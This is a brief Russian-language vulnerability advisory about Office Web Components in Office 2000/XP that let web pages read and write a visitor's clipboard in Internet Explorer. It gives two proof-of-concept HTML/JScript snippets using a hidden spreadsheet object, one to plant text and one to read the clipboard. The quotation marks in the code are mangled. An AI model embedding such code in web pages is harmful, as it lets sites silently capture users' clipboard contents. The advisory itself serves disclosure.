Office Web Components (OWC) — компонент Microsoft Office, используемый для создания HTML документов с электронными таблицами, диаграммами и т.п. В Office 2000 содержится 9-я версия OWC, в Office XP — 10-я. 

IE позволяет любому читать и писать данные буфера обмена при включенной
опции «Allow paste operations via script». Уязвимость позволяет манипулировать данными в буфера обмена даже при отключенной опции
"Allow paste operations via script», используя компонент Spreadsheet в OWC9 и OWC10. 

«Paste» метод Range и » Copy» метод Cell позволяют нападающему получить полный контроль над операциями буфера обмена. 

Нападающий может непрерывно контролировать буфер обмена жертвы и регистрировать результаты на сервере для более позднего просмотра. Можно также разместить данные внутри буфера обмена. 

Уязвимость найдена в Уязвимость найдена в Office
2000, XP.

Запись в буфер:

<object classid=»clsid:0002E510-0000-0000-C000-000000000046″ id=»oSP» style=»display:none»></object>
<script language=»jscript»>
onload=function () {
oSP.Cells(1,1).Value=» Don’t forget to subscribe for securitylab maillist !»;
oSP.Cells(1,1).Copy();
}
</script>

Чтение:

<object classid=»clsid:0002E510-0000-0000-C000-000000000046″ id=»oSP» style=»display:none»></object>
<script language=»jscript»>
onload=function () {
// Paste to spreadsheet
oSP.ActiveSheet.UsedRange.Paste();

// Read the spreadsheet
var oRng=oSP.ActiveSheet.UsedRange,
iRows=oRng.Rows.Count,
iCols=oRng.Columns.Count,
sRes=»»;

for (var iCRow=1;iCRow<=iRows;iCRow++) {
for (var iCCol=1;iCCol<=iCols;iCCol++) {
sRes+=(oSP.Cells(iCRow,iCCol).Value || «»)+»\t»;
}
sRes+=»\n»;
}

// Display result
alert(sRes);
}
</script>



Оставить мнение